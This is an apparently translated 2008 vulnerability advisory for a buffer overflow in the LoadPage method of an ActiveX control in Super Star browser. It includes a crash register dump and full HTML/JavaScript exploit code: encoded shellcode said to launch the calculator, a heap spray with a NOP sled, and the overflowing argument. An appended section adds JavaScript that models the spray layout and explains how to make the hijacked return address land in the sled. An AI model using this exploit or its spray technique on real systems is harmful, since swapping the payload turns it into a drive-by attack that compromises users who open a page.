Super Star Explorer 4.0 0day vulnerability & Exp - vulnerability warning - the black bar safety net

2008-09-22T00:00:00
ID MYHACK58:62200820481
Type myhack58
Reporter Anonymous (佚名)
Modified 2008-09-22T00:00:00

Description

Article author: friddy. Information source: Evil Octal Information Security Team (www.eviloctal.com)

Note: this article was first published by Friddy and then submitted by the original author to the Evil Octal Information Security Team discussion group. When reproducing it, please credit the site of first publication.

This article contains only a proof that the vulnerability exists: the payload launches the calculator program and contains no offensive code.

In November last year a vulnerability was found in target.Register(ok, buffer); this buffer overflow is in target.LoadPage(buffer, 1, 1, 1).

Vulnerability location: clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2, buffer overflow in the LoadPage function.

Exception: ACCESS_VIOLATION
Disasm: 41414141 ????? ()

Register state:

EIP 41414141
EAX BAADF000
EBX 00000000
ECX 00000000
EDX 00B36F48 -> 016E9D0C
EDI 0013E084 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESI 0013E39C -> 00000000
EBP 00B36F48 -> 016E9D0C
ESP 0013D85C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

ArgDump:

EBP+8  BAADF00D
EBP+12 00000000
EBP+16 BAADF00D
EBP+20 BAADF00D
EBP+24 BAADF00D
EBP+28 BAADF00D

Stack Dump:

13D85C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
13D86C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
13D87C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
13D88C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
13D89C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]

The dump shows that EIP is fully controlled by the argument (41414141 is "AAAA") and that the argument reaches the stack as a single-byte ANSI string (ESP -> Asc: AAAA..., not 00410041), so each byte of the string overwrites one byte of the saved return address.

The exploit (proof of concept):

<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'></object>
<P>Made By Friddy QQ:568623
<P>http://www.friddy.cn
<SCRIPT language="javascript">
// calc.exe payload, encoded as %uXXXX escapes (each escape is one 16-bit char, two bytes in memory)
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
// heap spray: a sled of 0x90 bytes followed by the shellcode, 300 copies of about 512 KB each
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize + shellcode.length; // total length
while (bigblock.length < slackspace) bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
memory = new Array();
for (x = 0; x < 300; x++) memory[x] = block + shellcode;
// overflowing argument: the 0x0a bytes overwrite the saved return address with 0x0a0a0a0a, an address inside the spray
var buffer = "";
while (buffer.length < 3092) buffer += "\x0a\x0a\x0a\x0a";
target.LoadPage(buffer, 1, 1, 1); // this time the problem is LoadPage, not Register
</script>
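The heap-spray arithmetic the exploit above depends on, as an added example that is not part of the original advisory or of Friddy's code. It rebuilds one spray block exactly the way the exploit does (the shellcode is replaced by a constructed placeholder of the same 67-char length), then checks whether the hijacked EIP of 0x0a0a0a0a lands in the NOP sled rather than in the shellcode, and whether 300 blocks are enough to reach that address. The layout model is an assumption: blocks are treated as laid out back to back from an assumed heap base, with no chunk headers or gaps, and the base address 0x02000000 is illustrative, not measured.

```javascript
// Added example (not from the original advisory): layout checks for the
// heap spray used by the LoadPage exploit. Assumption: spray blocks are
// modelled as contiguous from an assumed base; real heap chunks carry
// headers and are not perfectly contiguous, so this is an approximation.

// Build one spray block the way the exploit does. The shellcode is a
// constructed placeholder (int3 bytes) of the same length as the real payload.
function buildSprayBlock(shellcodeChars, headersize = 20, sprayChars = 0x40000) {
  const shellcode = "\uCCCC".repeat(shellcodeChars); // placeholder, constructed
  const slackspace = headersize + shellcode.length;
  let bigblock = "\u9090\u9090";                      // two 0x90 bytes per char
  while (bigblock.length < slackspace) bigblock += bigblock;
  const fillblock = bigblock.substring(0, slackspace);
  let block = bigblock.substring(0, bigblock.length - slackspace);
  while (block.length + slackspace < sprayChars) block = block + block + fillblock;
  const sprayed = block + shellcode;
  return {
    nopBytes: block.length * 2,       // every char of block is 0x9090
    shellcodeBytes: shellcode.length * 2,
    blockBytes: sprayed.length * 2,   // payload bytes, before any BSTR/heap header
  };
}

// Offset of the hijacked EIP inside whichever block it falls in, if blocks
// sit back to back from `base`. -1 if EIP is below the spray.
function landingOffset(layout, eip, base = 0) {
  if (eip < base) return -1;
  return (eip - base) % layout.blockBytes;
}

// In the sled, execution slides into the shellcode; in the shellcode itself,
// execution starts mid-payload and usually crashes.
function landsInSled(layout, eip, base = 0) {
  const off = landingOffset(layout, eip, base);
  return off >= 0 && off < layout.nopBytes;
}

// Does a spray of `count` blocks starting at `base` cover `eip` at all?
function sprayReaches(layout, count, eip, base) {
  return base <= eip && eip < base + count * layout.blockBytes;
}

// The exploit pads the argument with 0x0a bytes, so the saved return
// address becomes 0x0a0a0a0a.
const HIJACKED_EIP = 0x0a0a0a0a;

const layout = buildSprayBlock(67);
console.log(layout);
console.log("offset into block: 0x" + landingOffset(layout, HIJACKED_EIP).toString(16));
console.log("lands in NOP sled:", landsInSled(layout, HIJACKED_EIP));
// 300 blocks from an assumed heap base of 0x02000000 (illustrative, not measured)
console.log("spray reaches EIP:", sprayReaches(layout, 300, HIJACKED_EIP, 0x02000000));
```

Two things the numbers make visible: a JScript char is two bytes, so the 0x40000-char block is about 512 KB and 300 of them about 150 MB, which only reaches 0x0a0a0a0a because the process heap does not start at address zero; and because 0x0a0a0a0a is an arbitrary point inside a block, the sled has to be far larger than the shellcode for the landing offset to fall in the sled regardless of where chunk headers shift the blocks.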

Attachment: ssrexp.rar